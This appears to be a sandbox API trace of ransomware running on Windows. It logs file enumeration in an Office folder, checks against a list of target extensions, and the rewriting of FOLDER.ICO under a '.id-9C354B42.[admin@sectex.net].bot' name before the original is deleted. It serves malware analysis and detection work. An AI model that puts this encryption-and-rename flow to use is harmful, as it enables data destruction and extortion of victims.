	[0143.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60
	[0143.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60
	[0143.649] lstrlenW (lpString=".doc") returned 4
	[0143.649] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.649] lstrlenW (lpString=".docx") returned 5
	[0143.649] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0143.649] lstrlenW (lpString=".pdf") returned 4
	[0143.649] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.649] lstrlenW (lpString=".xls") returned 4
	[0143.649] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.649] lstrlenW (lpString=".xlsx") returned 5
	[0143.649] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0143.649] lstrlenW (lpString=".ppt") returned 4
	[0143.649] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60
	[0143.649] lstrlenW (lpString=".zip") returned 4
	[0143.649] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.649] lstrlenW (lpString=".rar") returned 4
	[0143.649] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.649] lstrlenW (lpString=".bz2") returned 4
	[0143.649] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.649] lstrlenW (lpString=".7z") returned 3
	[0143.649] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60
	[0143.650] lstrlenW (lpString=".dbf") returned 4
	[0143.650] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60
	[0143.650] lstrlenW (lpString=".1cd") returned 4
	[0143.650] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60
	[0143.650] lstrlenW (lpString=".jpg") returned 4
	[0143.650] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.650] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0143.650] lstrlenW (lpString="CLVWINTL.DLL") returned 12
	[0143.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\clvwintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.650] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=19880) returned 1
	[0143.650] CloseHandle (hObject=0x3cc) returned 1
	[0143.650] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\clvwintl.dll")) returned 0x20
	[0143.651] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\clvwintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\clvwintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0143.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60
	[0143.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60
	[0143.651] lstrlenW (lpString=".doc") returned 4
	[0143.651] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.651] lstrlenW (lpString=".docx") returned 5
	[0143.651] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0143.651] lstrlenW (lpString=".pdf") returned 4
	[0143.651] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.651] lstrlenW (lpString=".xls") returned 4
	[0143.651] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.651] lstrlenW (lpString=".xlsx") returned 5
	[0143.651] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0143.651] lstrlenW (lpString=".ppt") returned 4
	[0143.651] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60
	[0143.651] lstrlenW (lpString=".zip") returned 4
	[0143.651] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.651] lstrlenW (lpString=".rar") returned 4
	[0143.651] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.651] lstrlenW (lpString=".bz2") returned 4
	[0143.651] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.651] lstrlenW (lpString=".7z") returned 3
	[0143.651] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60
	[0143.651] lstrlenW (lpString=".dbf") returned 4
	[0143.652] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60
	[0143.652] lstrlenW (lpString=".1cd") returned 4
	[0143.652] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60
	[0143.652] lstrlenW (lpString=".jpg") returned 4
	[0143.652] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60
	[0143.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60
	[0143.652] lstrlenW (lpString=".doc") returned 4
	[0143.652] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.652] lstrlenW (lpString=".docx") returned 5
	[0143.652] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0143.652] lstrlenW (lpString=".pdf") returned 4
	[0143.652] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.652] lstrlenW (lpString=".xls") returned 4
	[0143.652] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.652] lstrlenW (lpString=".xlsx") returned 5
	[0143.652] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0143.652] lstrlenW (lpString=".ppt") returned 4
	[0143.652] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60
	[0143.652] lstrlenW (lpString=".zip") returned 4
	[0143.652] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.652] lstrlenW (lpString=".rar") returned 4
	[0143.652] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.653] lstrlenW (lpString=".bz2") returned 4
	[0143.653] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.653] lstrlenW (lpString=".7z") returned 3
	[0143.653] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60
	[0143.653] lstrlenW (lpString=".dbf") returned 4
	[0143.653] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60
	[0143.653] lstrlenW (lpString=".1cd") returned 4
	[0143.653] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CLVWINTL.DLL") returned 60
	[0143.653] lstrlenW (lpString=".jpg") returned 4
	[0143.653] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.653] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0143.653] lstrlenW (lpString="CMAXRES.DLL") returned 11
	[0143.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\cmaxres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.655] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=35216) returned 1
	[0143.655] CloseHandle (hObject=0x3cc) returned 1
	[0143.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\cmaxres.dll")) returned 0x20
	[0143.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\cmaxres.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\cmaxres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0143.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59
	[0143.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59
	[0143.657] lstrlenW (lpString=".doc") returned 4
	[0143.658] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.658] lstrlenW (lpString=".docx") returned 5
	[0143.658] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0143.658] lstrlenW (lpString=".pdf") returned 4
	[0143.658] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.658] lstrlenW (lpString=".xls") returned 4
	[0143.658] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.658] lstrlenW (lpString=".xlsx") returned 5
	[0143.658] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0143.658] lstrlenW (lpString=".ppt") returned 4
	[0143.658] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59
	[0143.658] lstrlenW (lpString=".zip") returned 4
	[0143.658] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.658] lstrlenW (lpString=".rar") returned 4
	[0143.658] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.658] lstrlenW (lpString=".bz2") returned 4
	[0143.658] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.658] lstrlenW (lpString=".7z") returned 3
	[0143.658] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59
	[0143.658] lstrlenW (lpString=".dbf") returned 4
	[0143.658] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59
	[0143.658] lstrlenW (lpString=".1cd") returned 4
	[0143.658] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59
	[0143.658] lstrlenW (lpString=".jpg") returned 4
	[0143.658] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59
	[0143.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59
	[0143.658] lstrlenW (lpString=".doc") returned 4
	[0143.658] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0143.659] lstrlenW (lpString=".docx") returned 5
	[0143.659] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0143.659] lstrlenW (lpString=".pdf") returned 4
	[0143.659] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0143.659] lstrlenW (lpString=".xls") returned 4
	[0143.659] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0143.659] lstrlenW (lpString=".xlsx") returned 5
	[0143.659] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0143.659] lstrlenW (lpString=".ppt") returned 4
	[0143.659] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0143.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59
	[0143.659] lstrlenW (lpString=".zip") returned 4
	[0143.659] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0143.659] lstrlenW (lpString=".rar") returned 4
	[0143.659] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0143.659] lstrlenW (lpString=".bz2") returned 4
	[0143.659] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0143.659] lstrlenW (lpString=".7z") returned 3
	[0143.659] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0143.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59
	[0143.659] lstrlenW (lpString=".dbf") returned 4
	[0143.659] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0143.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59
	[0143.659] lstrlenW (lpString=".1cd") returned 4
	[0143.659] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0143.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CMAXRES.DLL") returned 59
	[0143.659] lstrlenW (lpString=".jpg") returned 4
	[0143.659] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0143.659] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0143.659] lstrlenW (lpString="ContactPickerIntl.dll") returned 21
	[0143.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\contactpickerintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.660] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=16256) returned 1
	[0143.660] CloseHandle (hObject=0x3cc) returned 1
	[0143.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\contactpickerintl.dll")) returned 0x20
	[0143.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\contactpickerintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\contactpickerintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0143.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69
	[0143.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69
	[0143.661] lstrlenW (lpString=".doc") returned 4
	[0143.661] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0143.661] lstrlenW (lpString=".docx") returned 5
	[0143.661] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1
	[0143.661] lstrlenW (lpString=".pdf") returned 4
	[0143.661] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0143.661] lstrlenW (lpString=".xls") returned 4
	[0143.661] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0143.661] lstrlenW (lpString=".xlsx") returned 5
	[0143.661] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1
	[0143.661] lstrlenW (lpString=".ppt") returned 4
	[0143.661] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0143.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69
	[0143.661] lstrlenW (lpString=".zip") returned 4
	[0143.661] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0143.661] lstrlenW (lpString=".rar") returned 4
	[0143.661] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0143.661] lstrlenW (lpString=".bz2") returned 4
	[0143.661] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0143.661] lstrlenW (lpString=".7z") returned 3
	[0143.661] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0143.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69
	[0143.661] lstrlenW (lpString=".dbf") returned 4
	[0143.661] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0143.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69
	[0143.661] lstrlenW (lpString=".1cd") returned 4
	[0143.661] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0143.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69
	[0143.661] lstrlenW (lpString=".jpg") returned 4
	[0143.661] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0143.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69
	[0143.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69
	[0143.661] lstrlenW (lpString=".doc") returned 4
	[0143.662] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0143.662] lstrlenW (lpString=".docx") returned 5
	[0143.662] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1
	[0143.662] lstrlenW (lpString=".pdf") returned 4
	[0143.662] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0143.662] lstrlenW (lpString=".xls") returned 4
	[0143.662] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0143.662] lstrlenW (lpString=".xlsx") returned 5
	[0143.662] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1
	[0143.662] lstrlenW (lpString=".ppt") returned 4
	[0143.662] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0143.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69
	[0143.662] lstrlenW (lpString=".zip") returned 4
	[0143.662] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0143.662] lstrlenW (lpString=".rar") returned 4
	[0143.662] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0143.662] lstrlenW (lpString=".bz2") returned 4
	[0143.662] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0143.662] lstrlenW (lpString=".7z") returned 3
	[0143.662] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0143.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69
	[0143.662] lstrlenW (lpString=".dbf") returned 4
	[0143.662] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0143.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69
	[0143.662] lstrlenW (lpString=".1cd") returned 4
	[0143.662] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0143.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ContactPickerIntl.dll") returned 69
	[0143.662] lstrlenW (lpString=".jpg") returned 4
	[0143.662] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0143.662] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0143.663] lstrlenW (lpString="FOLDER.ICO") returned 10
	[0143.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.665] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=4710) returned 1
	[0143.665] CloseHandle (hObject=0x3cc) returned 1
	[0143.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\folder.ico")) returned 0x20
	[0143.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\folder.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.665] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.665] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\folder.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.889] GetLastError () returned 0x0
	[0143.889] ReadFile (in: hFile=0x3cc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x1266, lpOverlapped=0x0) returned 1
	[0143.900] WriteFile (in: hFile=0x388, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x1270, lpOverlapped=0x0) returned 1
	[0143.901] ReadFile (in: hFile=0x3cc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.901] WriteFile (in: hFile=0x388, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0143.902] SetEndOfFile (hFile=0x388) returned 1
	[0143.902] CloseHandle (hObject=0x388) returned 1
	[0143.902] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.902] SetEndOfFile (hFile=0x3cc) returned 1
	[0143.905] CloseHandle (hObject=0x3cc) returned 1
	[0143.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.909] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\folder.ico")) returned 1
	[0143.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71
	[0143.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71
	[0143.910] lstrlenW (lpString=".doc") returned 4
	[0143.910] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0143.910] lstrlenW (lpString=".docx") returned 5
	[0143.910] lstrcmpiW (lpString1=".docx", lpString2="R.ICO") returned -1
	[0143.910] lstrlenW (lpString=".pdf") returned 4
	[0143.910] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0143.910] lstrlenW (lpString=".xls") returned 4
	[0143.910] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0143.910] lstrlenW (lpString=".xlsx") returned 5
	[0143.910] lstrcmpiW (lpString1=".xlsx", lpString2="R.ICO") returned -1
	[0143.910] lstrlenW (lpString=".ppt") returned 4
	[0143.910] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0143.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71
	[0143.910] lstrlenW (lpString=".zip") returned 4
	[0143.910] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0143.910] lstrlenW (lpString=".rar") returned 4
	[0143.910] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0143.910] lstrlenW (lpString=".bz2") returned 4
	[0143.910] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0143.910] lstrlenW (lpString=".7z") returned 3
	[0143.910] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0143.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71
	[0143.910] lstrlenW (lpString=".dbf") returned 4
	[0143.910] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0143.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71
	[0143.910] lstrlenW (lpString=".1cd") returned 4
	[0143.910] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0143.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\FOLDER.ICO") returned 71
	[0143.911] lstrlenW (lpString=".jpg") returned 4
	[0143.911] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
